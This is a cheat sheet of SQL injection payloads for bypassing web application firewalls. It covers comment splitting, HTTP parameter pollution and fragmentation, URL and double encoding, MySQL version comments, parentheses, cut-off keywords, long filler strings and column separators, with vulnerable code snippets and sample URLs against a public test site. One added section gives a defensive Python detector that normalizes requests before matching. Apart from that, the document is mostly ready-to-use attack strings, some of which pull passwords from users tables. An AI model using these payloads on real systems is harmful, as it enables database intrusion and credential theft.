#A# Bypassing WAF: SQL Injection - Normal Method
(1) Using a vulnerability in the request normalization function.
• The following request doesn’t allow anyone to conduct an attack
/?id=1+union+select+1,2,3/*
• If there is a corresponding vulnerability in the WAF, this request
will be successfully performed
/?id=1/*union*/union/*select*/select+1,2,3/*
• After being processed by WAF, the request will become
index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*
The given example works when the WAF cleans dangerous traffic, not when it blocks the entire request or the attack source.
(2) Using a vulnerability in the request normalization function.
• Similarly, the following request doesn’t allow anyone to conduct an attack
/?id=1+union+select+1,2,3/*
• If there is a corresponding vulnerability in the WAF, this request will be successfully performed
/?id=1+un/**/ion+sel/**/ect+1,2,3--
• The SQL request will become
SELECT * from table where id =1 union select 1,2,3--
Instead of the /**/ construction, any symbol sequence that the WAF cuts off can be used.
The given example works when the WAF cleans incoming data excessively (replacing a regular-expression match with the empty string).
(3) Using HTTP Parameter Pollution (HPP)
• The following request doesn’t allow anyone to conduct an attack
/?id=1;select+1,2,3+from+users+where+id=1--
• This request will be successfully performed using HPP
/?id=1;select+1&id=2,3+from+users+where+id=1--
Whether an HPP attack bypasses the WAF depends on the environment of the application being attacked (ASP and ASP.NET, for example, concatenate repeated parameters with a comma, which is what the next example relies on).
(4) Using HTTP Parameter Pollution (HPP)
• Vulnerable code
SQL=" select key from table where id= "+Request.QueryString("id")
• This request is successfully performed using the HPP technique
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
• The SQL request becomes
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
Bypassing WAF: SQL Injection - HPF
Using HTTP Parameter Fragmentation (HPF)
• Vulnerable code example
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);
• The following request doesn’t allow anyone to conduct an attack
/?a=1+union+select+1,2/*
• These requests may be successfully performed using HPF
/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
• The SQL requests become
select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
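The normalization and parameter-handling flaws behind techniques (1), (2), (3), (4) and HPF all come down to the WAF judging something other than what the database receives. The following added example (not from the original page) is a defender-side detector that decodes to a fixpoint, unwraps MySQL /*!NNNNN*/ conditional comments, deletes ordinary comments and '#' line comments, and then inspects the request both per parameter and as the back end may assemble it. The signatures are deliberately crude placeholders; the point is the normalization order and the request-level view.

```python
import re
from urllib.parse import unquote_plus

# Crude placeholder signatures for the page's UNION / stacked-SELECT payloads; applied to normalized text.
SIGNATURES = [re.compile(r"union.*select", re.S), re.compile(r"select.*from", re.S)]

def url_decode_fully(value, max_rounds=5):
    """Decode until nothing changes, so double encoding (%252f -> %2f -> /) is resolved."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def normalize(value):
    """Reduce a value to what the database would act on before any signature is applied."""
    text = url_decode_fully(value)
    text = re.sub(r"/\*!\d*", " ", text)               # /*!50000 ... : MySQL executes the body
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)  # plain comments are deleted (not spaced) so
    text = re.sub(r"\*/", " ", text)                   # un/**/ion closes up again; drop stray closers
    text = re.sub(r"#[^\n]*\n", " ", text)             # '#...' line comments (the %23...%0a trick)
    return re.sub(r"\s+", " ", text).strip().lower()

def is_suspicious(value):
    return any(sig.search(normalize(value)) for sig in SIGNATURES)

def parse_params(query_string):
    """Split on '&' only; keep raw values and duplicates, since HPP relies on duplicates."""
    params = {}
    for pair in query_string.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(value)
    return params

def per_parameter_verdict(query_string):
    """The inspection style the HPP/HPF examples defeat: every value judged in isolation."""
    return any(is_suspicious(v) for vals in parse_params(query_string).values() for v in vals)

def whole_request_verdict(query_string):
    """Judge the request as the back end may assemble it: duplicate values joined with ','
    (ASP/ASP.NET style) plus the raw query string with '&' and '=' read as whitespace."""
    views = [",".join(vals) for vals in parse_params(query_string).values()]
    views.append(query_string.replace("&", " ").replace("=", " "))
    return any(is_suspicious(v) for v in views)
```

Because the detector only flags and never rewrites the request, the cut-off trick of technique (8) (+UNunionION+SEselectLECT+) is also caught; a WAF that deletes matched keywords would instead hand the back end a clean UNION SELECT.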
(5) Using distinct & distinctROW
+union+distinct+select+
+union+distinctROW+select+
+union%20distinct%20select+
+union%20%64istinctRO%57%20select+
(6) Using HTTP encoding, URL-encoded payloads and double encoding
If the WAF blocks 'union' and 'select' together, the way to bypass it is to use Union %23aa%0a Select.
[url encoded]
+%55nion %53elect %55nion(%53elect)
[Space (%20); #Most commonly used]
+union%20select%20
/%2A%2A/union/%2A%2A/select
%252f%252a*/UNION%252f%252a*/SELECT
[multi-line comments /**/]
[id=999999.9%2F**%2FuNiOn%2F**%2FaLl%2F**%2FsElEcT%2F**%2F]
Multi-line comments start with /* and end with */.
Any text between /* and */ will be ignored by JavaScript.
%2F**%2Funion%2F**%2Fselect
/**/UnIoN/**/SeLecT/**/
/*!50000Union*/ SeLEct
/*!50000UnIoN*/ /*!50000SeLeCt*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
/**YmxhY2tyb3Nl**/UnIoN/**YmxhY2tyb3Nl**/SeLecT/**YmxhY2tyb3Nl**/
(7) Using parentheses instead of spaces
+(uNioN)+(sElECt)
+union (select 1,2,3,4,5)
union(select(1),2,3,4,5)
union(select(1),(2),(3),(4),(5))
(-1)union(select(1),(2),(3),(4),(5))
1%')and(0)union(select(1),1,3,4,5,6)%23%23%23
union(select(0),version(),(0),(0),(0),(0))
UNION(SELECT/**_**/(1),2),(3),(4),(5),(6),(7),(8),(9))-- -
(8) Using the cut-off technique
+UNunionION+SEselectLECT+
(9) Using the variable method (WAF triggers after union select)
http://pastebin.com/8Xd7QrWK
(10) Using routed query (double query) injection.
For routed query (double query) injection, we put a single quotation mark after the column number. Let's see:
index.php?cat=1 and false UNION SELECT 1',2,3,4,5,6-- -
(here we also get an SQL error, which we fix to continue)
We have to wrap the column number in double quotation marks (")
index.php?cat=1 and false UNION SELECT "1' -- -",2-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5,6-- - (now query is fixed)
http://testphp.vulnw...s.php?artist=-1 UNION SELECT 1,2,3-- -",2,3,4,5,6-- -
Let's see the video for this method.
(11) Using JOIN syntax.
The INNER JOIN keyword selects all rows from both tables as long as there is a match between the columns in both tables.
http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,2,3-- -
After UNION SELECT, add *
artists.php?artist=-1 UNION SELECT *
then add FROM
artists.php?artist=-1 UNION SELECT * FROM
Then wrap each column in brackets (select+1), give the column an alias (select+1)a, and link it to the other columns with JOIN, like
artists.php?artist=-1 union select * from (select 1)a join (select 2)b join (select 3)c -- -
http://testphp.vulnweb.com/artists.php?artist=-1+union+select+*+from+(select+1)a+join+(select+2)b+join+(select+3)c -- -
(12) Using buffer overflow.
The WAF blocks 'union' and 'select' together [Forbidden], so the way to bypass it is to use Union %23aa%0a Select.
--%23%0a/*!50000union*/%23AAAAAAAA%0a/*!50000select*/%23AAAAAAAA%0a+
or use this method
+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA [1000 more A's]) and then add it before union select, like:
/*50000and*/(/*!50000%53elect*/ 1)=(/*!32302%53elect*/ 0xAAAAAA 1000 more A’s) /**/ /*!50000%union*/ /*!50000%53elect*/ 1,2,3-- - etc
(13) Using the column separator style WAF bypass.
If we bypass union select but the WAF triggers once column numbers are added, we test the columns one by one and add a column separator before the column number that triggers the WAF, like:
id=4'*2e9unioN Select!1,2%23
id=4'*2e9unioN Select!1,2,3%23
id=4'*2e9unioN Select!1,2,3,4%23
id=4'*2e9unioN Select!1,2,3,4,5%23
The WAF triggers after 3 columns, so let's use the column separator style bypass.
Bypassed :- id=4'*2e9unioN Select!1,2,3,~4,5%23